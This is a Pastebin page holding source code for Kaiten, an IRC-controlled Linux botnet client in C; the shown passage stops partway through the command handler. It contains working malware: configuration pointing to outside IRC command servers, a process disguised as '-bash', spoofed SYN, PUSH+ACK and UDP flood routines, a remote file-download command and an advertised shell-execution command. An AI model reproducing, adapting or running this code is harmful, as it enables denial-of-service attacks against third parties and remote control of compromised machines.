FlyFar

Botnet.Linux.Kaiten/kaiten.c - Source Code

Jun 8th, 2023
112
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 39.28 KB | Cybersecurity | 0 0
  1. /*******************************************************************************
  2.  *   This is a IRC based distributed denial of service client.  It connects to *
  3.  * the server specified below and accepts commands via the channel specified.  *
  4.  * The syntax is:                                                              *
  5.  *       !<nick> <command>                                                     *
  6.  * You send this message to the channel that is defined later in this code.    *
  7.  * Where <nick> is the nickname of the client (which can include wildcards)    *
  8.  * and the command is the command that should be sent.  For example, if you    *
  9.  * want to tell all the clients with the nickname starting with N, to send you *
  10.  * the help message, you type in the channel:                                  *
  11.  *       !N* HELP                                                              *
  12.  * That will send you a list of all the commands.  You can also specify an     *
  13.  * astrick alone to make all client do a specific command:                     *
  14.  *       !* SH uname -a                                                        *
  15.  * There are a number of commands that can be sent to the client:              *
  16.  *       TSUNAMI <target> <secs>       = A PUSH+ACK flooder                    *
  17.  *       PAN <target> <port> <secs>    = A SYN flooder                         *
  18.  *       UDP <target> <port> <secs>    = An UDP flooder                        *
  19.  *       UNKNOWN <target> <secs>       = Another non-spoof udp flooder         *
  20.  *       NICK <nick>                   = Changes the nick of the client        *
  21.  *       SERVER <server>               = Changes servers                       *
  22.  *       GETSPOOFS                     = Gets the current spoofing             *
  23.  *       SPOOFS <subnet>               = Changes spoofing to a subnet          *
  24.  *       DISABLE                       = Disables all packeting from this bot  *
  25.  *       ENABLE                        = Enables all packeting from this bot   *
  26.  *       KILL                          = Kills the knight                      *
  27.  *       GET <http address> <save as>  = Downloads a file off the web          *
  28.  *       VERSION                       = Requests version of knight            *
  29.  *       KILLALL                       = Kills all current packeting           *
  30.  *       HELP                          = Displays this                         *
  31.  *       IRC <command>                 = Sends this command to the server      *
  32.  *       SH <command>                  = Executes a command                    *
  33.  * Remember, all these commands must be prefixed by a ! and the nickname that  *
  34.  * you want the command to be sent to (can include wildcards). There are no    *
  35.  * spaces in between the ! and the nickname, and there are no spaces before    *
  36.  * the !                                                                       *
  37.  *                                                                             *
  38.  *                               - contem on efnet                             *
  39.  *******************************************************************************/
  40. ////////////////////////////////////////////////////////////////////////////////
  41. //                                EDIT THESE                                  //
  42. ////////////////////////////////////////////////////////////////////////////////
  43. #undef STARTUP      // Start on startup?
  44. #undef IDENT      // Only enable this if you absolutely have to
  45. #define FAKENAME "-bash"  // What you want this to hide as
  46. #define CHAN "#whatever"  // Channel to join
  47. #define KEY "bleh"    // The key of the channel
  48. int numservers=4;    // Must change this to equal number of servers down there
  49. char *servers[] = {    // List the servers in that format, always end in (void*)0
  50.         "irc.qeast.net",
  51.   "irc2.magic.ca",
  52.   "irc.east.gblx.net",
  53.   "irc.west.gblx.net",
  54.         (void*)0
  55. };
  56. ////////////////////////////////////////////////////////////////////////////////
  57. //                               STOP HERE!                                   //
  58. ////////////////////////////////////////////////////////////////////////////////
  59. #include <stdarg.h>
  60. #include <errno.h>
  61. #include <stdio.h>
  62. #include <stdlib.h>
  63. #include <string.h>
  64. #include <sys/types.h>
  65. #include <sys/stat.h>
  66. #include <fcntl.h>
  67. #include <strings.h>
  68. #include <netinet/in.h>
  69. #include <unistd.h>
  70. #include <sys/time.h>
  71. #include <sys/socket.h>
  72. #include <signal.h>
  73. #include <arpa/inet.h>
  74. #include <netdb.h>
  75. #include <time.h>
  76. #include <sys/wait.h>
  77. #include <sys/ioctl.h>
  78. int sock,changeservers=0;
  79. char *server, *chan, *key, *nick, *ident, *user, disabled=0, execfile[256],dispass[256];
  80. unsigned int *pids;
  81. unsigned long spoofs=0, spoofsm=0, numpids=0;
  82. int strwildmatch(const char* pattern, const char* string) {
  83.   switch(*pattern) {
  84.     case '\0': return *string;
  85.     case '*': return !(!strwildmatch(pattern+1, string) || *string && !strwildmatch(pattern, string+1));
  86.     case '?': return !(*string && !strwildmatch(pattern+1, string+1));
  87.     default: return !((toupper(*pattern) == toupper(*string)) && !strwildmatch(pattern+1, string+1));
  88.   }
  89. }
  90. int Send(int sock, char *words, ...) {
  91.         static char textBuffer[1024];
  92.         va_list args;
  93.         va_start(args, words);
  94.         vsprintf(textBuffer, words, args);
  95.         va_end(args);
  96.         return write(sock,textBuffer,strlen(textBuffer));
  97. }
  98. int mfork(char *sender) {
  99.   unsigned int parent, *newpids, i;
  100.   if (disabled == 1) {
  101.     Send(sock,"NOTICE %s :Unable to comply.\n",sender);
  102.     return 1;
  103.   }
  104.   parent=fork();
  105.   if (parent <= 0) return parent;
  106.   numpids++;
  107.   newpids=(unsigned int*)malloc((numpids+1)*sizeof(unsigned int));
  108.   for (i=0;i<numpids-1;i++) newpids[i]=pids[i];
  109.   newpids[numpids-1]=parent;
  110.   free(pids);
  111.   pids=newpids;
  112.   return parent;
  113. }
  114. unsigned long getspoof() {
  115.   if (!spoofs) return rand();
  116.   if (spoofsm == 1) return ntohl(spoofs);
  117.   return ntohl(spoofs+(rand() % spoofsm)+1);
  118. }
  119. void filter(char *a) { while(a[strlen(a)-1] == '\r' || a[strlen(a)-1] == '\n') a[strlen(a)-1]=0; }
  120. char *makestring() {
  121.   char *tmp;
  122.   int len=(rand()%5)+4,i;
  123.    FILE *file;
  124.   tmp=(char*)malloc(len+1);
  125.    memset(tmp,0,len+1);
  126.    if ((file=fopen("/usr/dict/words","r")) == NULL) for (i=0;i<len;i++) tmp[i]=(rand()%(91-65))+65;
  127.   else {
  128.     int a=((rand()*rand())%45402)+1;
  129.     char buf[1024];
  130.     for (i=0;i<a;i++) fgets(buf,1024,file);
  131.     memset(buf,0,1024);
  132.     fgets(buf,1024,file);
  133.     filter(buf);
  134.     memcpy(tmp,buf,len);
  135.     fclose(file);
  136.   }
  137.   return tmp;
  138. }
  139. void identd() {
  140.         int sockname,sockfd,sin_size,tmpsock,i;
  141.         struct sockaddr_in my_addr,their_addr;
  142.         char szBuffer[1024];
  143.         if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) return;
  144.         my_addr.sin_family = AF_INET;
  145.         my_addr.sin_port = htons(113);
  146.         my_addr.sin_addr.s_addr = INADDR_ANY;
  147.         memset(&(my_addr.sin_zero), 0, 8);
  148.         if (bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr)) == -1) return;
  149.         if (listen(sockfd, 1) == -1) return;
  150.         if (fork() == 0) return;
  151.         sin_size = sizeof(struct sockaddr_in);
  152.         if ((tmpsock = accept(sockfd, (struct sockaddr *)&their_addr, &sin_size)) == -1) exit(0);
  153.         for(;;) {
  154.                 fd_set bla;
  155.                 struct timeval timee;
  156.                 FD_ZERO(&bla);
  157.                 FD_SET(tmpsock,&bla);
  158.                 timee.tv_sec=timee.tv_usec=60;
  159.                 if (select(tmpsock + 1,&bla,(fd_set*)0,(fd_set*)0,&timee) < 0) exit(0);
  160.                 if (FD_ISSET(tmpsock,&bla)) break;
  161.         }
  162.         i = recv(tmpsock,szBuffer,1024,0);
  163.         if (i <= 0 || i >= 20) exit(0);
  164.         szBuffer[i]=0;
  165.         if (szBuffer[i-1] == '\n' || szBuffer[i-1] == '\r') szBuffer[i-1]=0;
  166.         if (szBuffer[i-2] == '\n' || szBuffer[i-2] == '\r') szBuffer[i-2]=0;
  167.   Send(tmpsock,"%s : USERID : UNIX : %s\n",szBuffer,ident);
  168.         close(tmpsock);
  169.         close(sockfd);
  170.         exit(0);
  171. }
  172. long pow(long a, long b) {
  173.         if (b == 0) return 1;
  174.         if (b == 1) return a;
  175.         return a*pow(a,b-1);
  176. }
  177. u_short in_cksum(u_short *addr, int len) {
  178.         register int nleft = len;
  179.         register u_short *w = addr;
  180.         register int sum = 0;
  181.         u_short answer =0;
  182.         while (nleft > 1) {
  183.                 sum += *w++;
  184.                 nleft -= 2;
  185.         }
  186.         if (nleft == 1) {
  187.                 *(u_char *)(&answer) = *(u_char *)w;
  188.                 sum += answer;
  189.         }
  190.         sum = (sum >> 16) + (sum & 0xffff);
  191.         sum += (sum >> 16);
  192.         answer = ~sum;
  193.         return(answer);
  194. }
  195. void get(int sock, char *sender, int argc, char **argv) {
  196.         int sock2,i,d;
  197.         struct sockaddr_in server;
  198.         unsigned long ipaddr;
  199.         char buf[1024];
  200.         FILE *file;
  201.         unsigned char bufm[4096];
  202.         if (mfork(sender) != 0) return;
  203.         if (argc < 2) {
  204.                 Send(sock,"NOTICE %s :GET <host> <save as>\n",sender);
  205.                 exit(0);
  206.         }
  207.         if ((sock2 = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
  208.                 Send(sock,"NOTICE %s :Unable to create socket.\n",sender);
  209.                 exit(0);
  210.         }
  211.         if (!strncmp(argv[1],"http://",7)) strcpy(buf,argv[1]+7);
  212.         else strcpy(buf,argv[1]);
  213.         for (i=0;i<strlen(buf) && buf[i] != '/';i++);
  214.         buf[i]=0;
  215.         server.sin_family = AF_INET;
  216.         server.sin_port = htons(80);
  217.         if ((ipaddr = inet_addr(buf)) == -1) {
  218.                 struct hostent *hostm;
  219.                 if ((hostm=gethostbyname(buf)) == NULL) {
  220.                         Send(sock,"NOTICE %s :Unable to resolve address.\n",sender);
  221.                         exit(0);
  222.                 }
  223.                 memcpy((char*)&server.sin_addr, hostm->h_addr, hostm->h_length);
  224.         }
  225.         else server.sin_addr.s_addr = ipaddr;
  226.         memset(&(server.sin_zero), 0, 8);
  227.         if (connect(sock2,(struct sockaddr *)&server, sizeof(server)) != 0) {
  228.                 Send(sock,"NOTICE %s :Unable to connect to http.\n",sender);
  229.                 exit(0);
  230.         }
  231.  
  232.         Send(sock2,"GET /%s HTTP/1.0\r\nConnection: Keep-Alive\r\nUser-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)\r\nHost: %s:80\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\r\nAccept-Encoding: gzip\r\nAccept-Language: en\r\nAccept-Charset: iso-8859-1,*,utf-8\r\n\r\n",buf+i+1,buf);
  233.         Send(sock,"NOTICE %s :Receiving file.\n",sender);
  234.         file=fopen(argv[2],"wb");
  235.         while(1) {
  236.                 int i;
  237.                 if ((i=recv(sock2,bufm,4096,0)) <= 0) break;
  238.                 if (i < 4096) bufm[i]=0;
  239.                 for (d=0;d<i;d++) if (!strncmp(bufm+d,"\r\n\r\n",4)) {
  240.                         for (d+=4;d<i;d++) fputc(bufm[d],file);
  241.                         goto done;
  242.                 }
  243.         }
  244.         done:
  245.         Send(sock,"NOTICE %s :Saved as %s\n",sender,argv[2]);
  246.         while(1) {
  247.                 int i,d;
  248.                 if ((i=recv(sock2,bufm,4096,0)) <= 0) break;
  249.                 if (i < 4096) bufm[i]=0;
  250.                 for (d=0;d<i;d++) fputc(bufm[d],file);
  251.         }
  252.         fclose(file);
  253.         close(sock2);
  254.         exit(0);
  255. }
  256. void getspoofs(int sock, char *sender, int argc, char **argv) {
  257.         unsigned long a=spoofs,b=spoofs+(spoofsm-1);
  258.         if (spoofsm == 1) Send(sock,"NOTICE %s :Spoofs: %d.%d.%d.%d\n",sender,((u_char*)&a)[3],((u_char*)&a)[2],((u_char*)&a)[1],((u_char*)&a)[0]);
  259.         else Send(sock,"NOTICE %s :Spoofs: %d.%d.%d.%d - %d.%d.%d.%d\n",sender,((u_char*)&a)[3],((u_char*)&a)[2],((u_char*)&a)[1],((u_char*)&a)[0],((u_char*)&b)[3],((u_char*)&b)[2],((u_char*)&b)[1],((u_char*)&b)[0]);
  260. }
  261. void version(int sock, char *sender, int argc, char **argv) {
  262.         Send(sock,"NOTICE %s :Kaiten wa goraku\n",sender);
  263. }
  264. void nickc(int sock, char *sender, int argc, char **argv) {
  265.         if (argc != 1) {
  266.                 Send(sock,"NOTICE %s :NICK <nick>\n",sender);
  267.                 return;
  268.         }
  269.         if (strlen(argv[1]) >= 10) {
  270.                 Send(sock,"NOTICE %s :Nick cannot be larger than 9 characters.\n",sender);
  271.                 return;
  272.         }
  273.         Send(sock,"NICK %s\n",argv[1]);
  274. }
  275. void disable(int sock, char *sender, int argc, char **argv) {
  276.         if (argc != 1) {
  277.                 Send(sock,"NOTICE %s :DISABLE <pass>\n",sender);
  278.                 Send(sock,"NOTICE %s :Current status is: %s.\n",sender,disabled?"Disabled":"Enabled and awaiting orders");
  279.                 return;
  280.         }
  281.   if (disabled) {
  282.     Send(sock,"NOTICE %s :Already disabled.\n",sender);
  283.     return;
  284.   }
  285.   if (strlen(argv[1]) > 254) {
  286.                 Send(sock,"NOTICE %s :Password too long! > 254\n",sender);
  287.                 return;
  288.   }
  289.         disabled=1;
  290.   memset(dispass,0,256);
  291.   strcpy(dispass,argv[1]);
  292.   Send(sock,"NOTICE %s :Disable sucessful.\n");
  293. }
  294. void enable(int sock, char *sender, int argc, char **argv) {
  295.         if (argc != 1) {
  296.                 Send(sock,"NOTICE %s :ENABLE <pass>\n",sender);
  297.                 Send(sock,"NOTICE %s :Current status is: %s.\n",sender,disabled?"Disabled":"Enabled and awaiting orders");
  298.                 return;
  299.         }
  300.   if (!disabled) {
  301.     Send(sock,"NOTICE %s :Already enabled.\n",sender);
  302.     return;
  303.   }
  304.   if (strcasecmp(dispass,argv[1])) {
  305.     Send(sock,"NOTICE %s :Wrong password\n",sender);
  306.     return;
  307.   }
  308.         disabled=0;
  309.   Send(sock,"NOTICE %s :Password correct.\n",sender);
  310. }
  311. void spoof(int sock, char *sender, int argc, char **argv) {
  312.         char ip[256];
  313.         int i, num;
  314.         unsigned long uip;
  315.         if (argc != 1) {
  316.                 Send(sock,"NOTICE %s :Removed all spoofs\n",sender);
  317.                 spoofs=0;
  318.                 spoofsm=0;
  319.                 return;
  320.         }
  321.         if (strlen(argv[1]) > 16) {
  322.                 Send(sock,"NOTICE %s :What kind of subnet address is that? Do something like: 169.40\n",sender);
  323.                 return;
  324.         }
  325.         strcpy(ip,argv[1]);
  326.         if (ip[strlen(ip)-1] == '.') ip[strlen(ip)-1] = 0;
  327.         for (i=0, num=1;i<strlen(ip);i++) if (ip[i] == '.') num++;
  328.         num=-(num-4);
  329.         for (i=0;i<num;i++) strcat(ip,".0");
  330.         uip=inet_network(ip);
  331.         if (num == 0) spoofsm=1;
  332.         else spoofsm=pow(256,num);
  333.         spoofs=uip;
  334. }
  335. struct iphdr {
  336.         unsigned int ihl:4, version:4;
  337.         unsigned char tos;
  338.         unsigned short tot_len;
  339.         unsigned short id;
  340.         unsigned short frag_off;
  341.         unsigned char ttl;
  342.         unsigned char protocol;
  343.         unsigned short check;
  344.         unsigned long saddr;
  345.         unsigned long daddr;
  346. };
  347. struct udphdr {
  348.         unsigned short source;
  349.         unsigned short dest;
  350.         unsigned short len;
  351.         unsigned short check;
  352. };
  353. struct tcphdr {
  354.         unsigned short source;
  355.         unsigned short dest;
  356.         unsigned long seq;
  357.         unsigned long ack_seq;
  358.         unsigned short res1:4, doff:4;
  359.   unsigned char fin:1, syn:1, rst:1, psh:1, ack:1, urg:1, ece:1, cwr:1;
  360.         unsigned short window;
  361.         unsigned short check;
  362.         unsigned short urg_ptr;
  363. };
  364. struct send_tcp {
  365.   struct iphdr ip;
  366.   struct tcphdr tcp;
  367.   char buf[20];
  368. };
  369. struct pseudo_header {
  370.   unsigned int source_address;
  371.   unsigned int dest_address;
  372.   unsigned char placeholder;
  373.   unsigned char protocol;
  374.   unsigned short tcp_length;
  375.   struct tcphdr tcp;
  376.   char buf[20];
  377. };
  378. unsigned int host2ip(char *sender,char *hostname) {
  379.         static struct in_addr i;
  380.         struct hostent *h;
  381.         if((i.s_addr = inet_addr(hostname)) == -1) {
  382.                 if((h = gethostbyname(hostname)) == NULL) {
  383.                         Send(sock, "NOTICE %s :Unable to resolve %s\n", sender,hostname);
  384.                         exit(0);
  385.                 }
  386.                 bcopy(h->h_addr, (char *)&i.s_addr, h->h_length);
  387.         }
  388.         return i.s_addr;
  389. }
  390. void udp(int sock, char *sender, int argc, char **argv) {
  391.         unsigned int port,i=0;
  392.         unsigned long psize,target,secs;
  393.         struct sockaddr_in s_in;
  394.         struct iphdr *ip;
  395.   struct udphdr *udp;
  396.   char buf[1500],*str;
  397.         int get;
  398.         time_t start=time(NULL);
  399.         if (mfork(sender) != 0) return;
  400.         if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1);
  401.         if (argc < 3) {
  402.                 Send(sock,"NOTICE %s :UDP <target> <port> <secs>\n",sender);
  403.                 exit(1);
  404.         }
  405.         target = host2ip(sender,argv[1]);
  406.         port = atoi(argv[2]);
  407.         secs = atol(argv[3]);
  408.         ip=(void*)buf;
  409.   udp=(void*)(buf+sizeof(struct iphdr));
  410.         str=(void*)(buf+sizeof(struct iphdr)+sizeof(struct udphdr));
  411.         memset(str,10,1500-(sizeof(struct iphdr)+sizeof(struct udphdr)));
  412.         Send(sock,"NOTICE %s :Packeting %s.\n",sender,argv[1]);
  413.         ip->ihl = 5;
  414.         ip->version = 4;
  415.         ip->tos = 0;
  416.         ip->tot_len = 1500;
  417.         ip->frag_off = 0;
  418.         ip->protocol = 17;
  419.         ip->ttl = 64;
  420.         ip->daddr = target;
  421.         udp->len = htons(psize);
  422.         s_in.sin_family  = AF_INET;
  423.         s_in.sin_addr.s_addr = target;
  424.         for (;;) {
  425.                 udp->source = rand();
  426.                 if (port) udp->dest = htons(port);
  427.                 else udp->dest = rand();
  428.                 udp->check = in_cksum((u_short *)buf,1500);
  429.                 ip->saddr = getspoof();
  430.                 ip->id = rand();
  431.                 ip->check = in_cksum((u_short *)buf,1500);
  432.                 s_in.sin_port = udp->dest;
  433.                 sendto(get,buf,1500,0,(struct sockaddr *)&s_in,sizeof(s_in));
  434.                 if (i >= 50) {
  435.                         if (time(NULL) >= start+secs) exit(0);
  436.                         i=0;
  437.                 }
  438.                 i++;
  439.         }
  440. }
  441. void pan(int sock, char *sender, int argc, char **argv) {
  442.         struct send_tcp send_tcp;
  443.         struct pseudo_header pseudo_header;
  444.         struct sockaddr_in sin;
  445.         unsigned int syn[20] = { 2,4,5,180,4,2,8,10,0,0,0,0,0,0,0,0,1,3,3,0 }, a=0;
  446.         unsigned int psize=20, source, dest, check;
  447.         unsigned long saddr, daddr,secs;
  448.         int get;
  449.         time_t start=time(NULL);
  450.         if (mfork(sender) != 0) return;
  451.         if (argc < 3) {
  452.                 Send(sock,"NOTICE %s :PAN <target> <port> <secs>\n",sender);
  453.                 exit(1);
  454.         }
  455.         if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1);
  456.         {int i; for(i=0;i<20;i++) send_tcp.buf[i]=(u_char)syn[i];}
  457.         daddr=host2ip(sender,argv[1]);
  458.         secs=atol(argv[3]);
  459.         Send(sock,"NOTICE %s :Panning %s.\n",sender,argv[1]);
  460.         send_tcp.ip.ihl = 5;
  461.         send_tcp.ip.version = 4;
  462.         send_tcp.ip.tos = 16;
  463.         send_tcp.ip.frag_off = 64;
  464.         send_tcp.ip.ttl = 64;
  465.         send_tcp.ip.protocol = 6;
  466.         send_tcp.tcp.ack_seq = 0;
  467.         send_tcp.tcp.doff = 10;
  468.         send_tcp.tcp.res1 = 0;
  469.         send_tcp.tcp.cwr = 0;
  470.         send_tcp.tcp.ece = 0;
  471.         send_tcp.tcp.urg = 0;
  472.         send_tcp.tcp.ack = 0;
  473.         send_tcp.tcp.psh = 0;
  474.         send_tcp.tcp.rst = 0;
  475.         send_tcp.tcp.fin = 0;
  476.         send_tcp.tcp.syn = 1;
  477.         send_tcp.tcp.window = 30845;
  478.         send_tcp.tcp.urg_ptr = 0;
  479.         dest=htons(atoi(argv[2]));
  480.         while(1) {
  481.                 source=rand();
  482.                 if (atoi(argv[2]) == 0) dest=rand();
  483.                 saddr=getspoof();
  484.                 send_tcp.ip.tot_len = htons(40+psize);
  485.                 send_tcp.ip.id = rand();
  486.                 send_tcp.ip.saddr = saddr;
  487.                 send_tcp.ip.daddr = daddr;
  488.                 send_tcp.ip.check = 0;
  489.                 send_tcp.tcp.source = source;
  490.                 send_tcp.tcp.dest = dest;
  491.                 send_tcp.tcp.seq = rand();
  492.                 send_tcp.tcp.check = 0;
  493.                 sin.sin_family = AF_INET;
  494.                 sin.sin_port = dest;
  495.                 sin.sin_addr.s_addr = send_tcp.ip.daddr;
  496.                 send_tcp.ip.check = in_cksum((unsigned short *)&send_tcp.ip, 20);
  497.                 check = rand();
  498.                 send_tcp.buf[9]=((char*)&check)[0];
  499.                 send_tcp.buf[10]=((char*)&check)[1];
  500.                 send_tcp.buf[11]=((char*)&check)[2];
  501.                 send_tcp.buf[12]=((char*)&check)[3];
  502.                 pseudo_header.source_address = send_tcp.ip.saddr;
  503.                 pseudo_header.dest_address = send_tcp.ip.daddr;
  504.                 pseudo_header.placeholder = 0;
  505.                 pseudo_header.protocol = IPPROTO_TCP;
  506.                 pseudo_header.tcp_length = htons(20+psize);
  507.                 bcopy((char *)&send_tcp.tcp, (char *)&pseudo_header.tcp, 20);
  508.                 bcopy((char *)&send_tcp.buf, (char *)&pseudo_header.buf, psize);
  509.                 send_tcp.tcp.check = in_cksum((unsigned short *)&pseudo_header, 32+psize);
  510.                 sendto(get, &send_tcp, 40+psize, 0, (struct sockaddr *)&sin, sizeof(sin));
  511.                 if (a >= 50) {
  512.                         if (time(NULL) >= start+secs) exit(0);
  513.                         a=0;
  514.                 }
  515.                 a++;
  516.         }
  517.         close(get);
  518.         exit(0);
  519. }
  520. void tsunami(int sock, char *sender, int argc, char **argv) {
  521.         struct send_tcp send_tcp;
  522.         struct pseudo_header pseudo_header;
  523.         struct sockaddr_in sin;
  524.         unsigned int psize=1400, check,i;
  525.         unsigned long saddr, daddr,secs;
  526.         int get;
  527.         time_t start=time(NULL);
  528.         if (mfork(sender) != 0) return;
  529.         if (argc < 2) {
  530.                 Send(sock,"NOTICE %s :TSUNAMI <target> <secs>\n",sender);
  531.                 exit(1);
  532.         }
  533.         secs=atol(argv[2]);
  534.         if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1);
  535.         srand(time(NULL) ^ getpid());
  536.         memset(send_tcp.buf,rand(),psize);
  537.         daddr=host2ip(sender,argv[1]);
  538.         Send(sock,"NOTICE %s :Tsunami heading for %s.\n",sender,argv[1]);
  539.         while(1) {
  540.                 saddr=getspoof();
  541.                 send_tcp.ip.ihl = 5;
  542.                 send_tcp.ip.version = 4;
  543.                 send_tcp.ip.tos = 16;
  544.                 send_tcp.ip.tot_len = htons(40+psize);
  545.                 send_tcp.ip.id = rand();
  546.                 send_tcp.ip.frag_off = 64;
  547.                 send_tcp.ip.ttl = 64;
  548.                 send_tcp.ip.protocol = 6;
  549.                 send_tcp.ip.check = 0;
  550.                 send_tcp.ip.saddr = saddr;
  551.                 send_tcp.ip.daddr = daddr;
  552.                 send_tcp.tcp.source = rand();
  553.                 send_tcp.tcp.dest = rand();
  554.                 send_tcp.tcp.seq = rand();
  555.                 send_tcp.tcp.ack_seq = rand();
  556.                 send_tcp.tcp.doff = 5;
  557.                 send_tcp.tcp.res1 = 0;
  558.                 send_tcp.tcp.cwr = 0;
  559.                 send_tcp.tcp.ece = 0;
  560.                 send_tcp.tcp.urg = 0;
  561.                 send_tcp.tcp.ack = 1;
  562.                 send_tcp.tcp.psh = 1;
  563.                 send_tcp.tcp.rst = 0;
  564.                 send_tcp.tcp.fin = 0;
  565.                 send_tcp.tcp.syn = 0;
  566.                 send_tcp.tcp.window = 30845;
  567.                 send_tcp.tcp.check = 0;
  568.                 send_tcp.tcp.urg_ptr = 0;
  569.                 sin.sin_family = AF_INET;
  570.                 sin.sin_port = send_tcp.tcp.dest;
  571.                 sin.sin_addr.s_addr = send_tcp.ip.daddr;
  572.                 send_tcp.ip.check = in_cksum((unsigned short *)&send_tcp.ip, 20);
  573.                 check = in_cksum((unsigned short *)&send_tcp, 40);
  574.                 pseudo_header.source_address = send_tcp.ip.saddr;
  575.                 pseudo_header.dest_address = send_tcp.ip.daddr;
  576.                 pseudo_header.placeholder = 0;
  577.                 pseudo_header.protocol = IPPROTO_TCP;
  578.                 pseudo_header.tcp_length = htons(20+psize);
  579.                 bcopy((char *)&send_tcp.tcp, (char *)&pseudo_header.tcp, 20);
  580.                 bcopy((char *)&send_tcp.buf, (char *)&pseudo_header.buf, psize);
  581.                 send_tcp.tcp.check = in_cksum((unsigned short *)&pseudo_header, 32+psize);
  582.                 sendto(get, &send_tcp, 40+psize, 0, (struct sockaddr *)&sin, sizeof(sin));
  583.                 if (i >= 50) {
  584.                         if (time(NULL) >= start+secs) break;
  585.                         i=0;
  586.                 }
  587.                 i++;
  588.         }
  589.         close(get);
  590.         exit(0);
  591. }
  592. void unknown(int sock, char *sender, int argc, char **argv) {
  593.   int flag=1,fd,i;
  594.   unsigned long secs;
  595.   char *buf=(char*)malloc(9216);
  596.    struct hostent *hp;
  597.   struct sockaddr_in in;
  598.         time_t start=time(NULL);
  599.         if (mfork(sender) != 0) return;
  600.         if (argc < 2) {
  601.                 Send(sock,"NOTICE %s :UNKNOWN <target> <secs>\n",sender);
  602.                 exit(1);
  603.         }
  604.         secs=atol(argv[2]);
  605.   memset((void*)&in,0,sizeof(struct sockaddr_in));
  606.   in.sin_addr.s_addr=host2ip(sender,argv[1]);
  607.   in.sin_family = AF_INET;
  608.         Send(sock,"NOTICE %s :Unknowning %s.\n",sender,argv[1]);
  609.   while(1) {
  610.     in.sin_port = rand();
  611.     if ((fd = socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP)) < 0);
  612.     else {
  613.       flag=1;
  614.       ioctl(fd,FIONBIO,&flag);
  615.       sendto(fd,buf,9216,0,(struct sockaddr*)&in,sizeof(in));
  616.       close(fd);
  617.     }
  618.                 if (i >= 50) {
  619.                         if (time(NULL) >= start+secs) break;
  620.                         i=0;
  621.                 }
  622.                 i++;
  623.   }
  624.         close(fd);
  625.   exit(0);
  626. }
  627. void move(int sock, char *sender, int argc, char **argv) {
  628.         if (argc < 1) {
  629.                 Send(sock,"NOTICE %s :MOVE <server>\n",sender);
  630.                 exit(1);
  631.         }
  632.   server=strdup(argv[1]);
  633.   changeservers=1;
  634.   close(sock);
  635. }
  636. void help(int sock, char *sender, int argc, char **argv) {
  637.         if (mfork(sender) != 0) return;
  638.         Send(sock,"NOTICE %s :TSUNAMI <target> <secs>                          = Special packeter that wont be blocked by most firewalls\n",sender); sleep(2);
  639.         Send(sock,"NOTICE %s :PAN <target> <port> <secs>                       = An advanced syn flooder that will kill most network drivers\n",sender); sleep(2);
  640.         Send(sock,"NOTICE %s :UDP <target> <port> <secs>                       = A udp flooder\n",sender); sleep(2);
  641.         Send(sock,"NOTICE %s :UNKNOWN <target> <secs>                          = Another non-spoof udp flooder\n",sender); sleep(2);
  642.  
  643.         Send(sock,"NOTICE %s :NICK <nick>                                      = Changes the nick of the client\n",sender); sleep(2);
  644.   Send(sock,"NOTICE %s :SERVER <server>                                  = Changes servers\n",sender); sleep(2);
  645.         Send(sock,"NOTICE %s :GETSPOOFS                                        = Gets the current spoofing\n",sender); sleep(2);
  646.         Send(sock,"NOTICE %s :SPOOFS <subnet>                                  = Changes spoofing to a subnet\n",sender); sleep(2);
  647.  
  648.         Send(sock,"NOTICE %s :DISABLE                                          = Disables all packeting from this client\n",sender); sleep(2);
  649.         Send(sock,"NOTICE %s :ENABLE                                           = Enables all packeting from this client\n",sender); sleep(2);
  650.  
  651.         Send(sock,"NOTICE %s :KILL                                             = Kills the client\n",sender); sleep(2);
  652.   Send(sock,"NOTICE %s :GET <http address> <save as>                     = Downloads a file off the web and saves it onto the hd\n",sender); sleep(2);
  653.         Send(sock,"NOTICE %s :VERSION                                          = Requests version of client\n",sender); sleep(2);
  654.         Send(sock,"NOTICE %s :KILLALL                                          = Kills all current packeting\n",sender); sleep(2);
  655.         Send(sock,"NOTICE %s :HELP                                             = Displays this\n",sender);
  656.  
  657.   Send(sock,"NOTICE %s :IRC <command>                                    = Sends this command to the server\n",sender); sleep(2);
  658.   Send(sock,"NOTICE %s :SH <command>                                     = Executes a command\n",sender); sleep(2);
  659.         exit(0);
  660. }
  661. void killall(int sock, char *sender, int argc, char **argv) {
  662.         unsigned long i;
  663.         for (i=0;i<numpids;i++) {
  664.                 if (pids[i] != 0 && pids[i] != getpid()) {
  665.                         if (sender) Send(sock,"NOTICE %s :Killing pid %d.\n",sender,pids[i]);
  666.                         kill(pids[i],9);
  667.                 }
  668.         }
  669. }
  670. void killd(int sock, char *sender, int argc, char **argv) {
  671.   if (!disable) kill(0,9);
  672.   else Send(sock,"NOTICE %s :Unable to comply.\n");
  673. }
  674. struct FMessages { char *cmd; void (* func)(int,char *,int,char **); } flooders[] = {
  675.   { "TSUNAMI", tsunami },
  676.         { "PAN", pan },
  677.         { "UDP", udp },
  678.   { "UNKNOWN", unknown },
  679.  
  680.         { "NICK", nickc },
  681.         { "SERVER", move },
  682.   { "GETSPOOFS", getspoofs },
  683.         { "SPOOFS", spoof },
  684.  
  685.   { "DISABLE", disable },
  686.         { "ENABLE", enable },
  687.  
  688.         { "KILL", killd },
  689.   { "GET", get },
  690.         { "VERSION", version },
  691.         { "KILLALL", killall },
  692.         { "HELP", help },
  693. { (char *)0, (void (*)(int,char *,int,char **))0 } };
  694. void _PRIVMSG(int sock, char *sender, char *str) {
  695.         int i;
  696.         char *to, *message;
  697.         for (i=0;i<strlen(str) && str[i] != ' ';i++);
  698.         str[i]=0;
  699.         to=str;
  700.         message=str+i+2;
  701.         for (i=0;i<strlen(sender) && sender[i] != '!';i++);
  702.         sender[i]=0;
  703.         if (*message == '!' && !strcasecmp(to,chan)) {
  704.                 char *params[12], name[1024]={0};
  705.                 int num_params=0, m;
  706.                 message++;
  707.                 for (i=0;i<strlen(message) && message[i] != ' ';i++);
  708.                 message[i]=0;
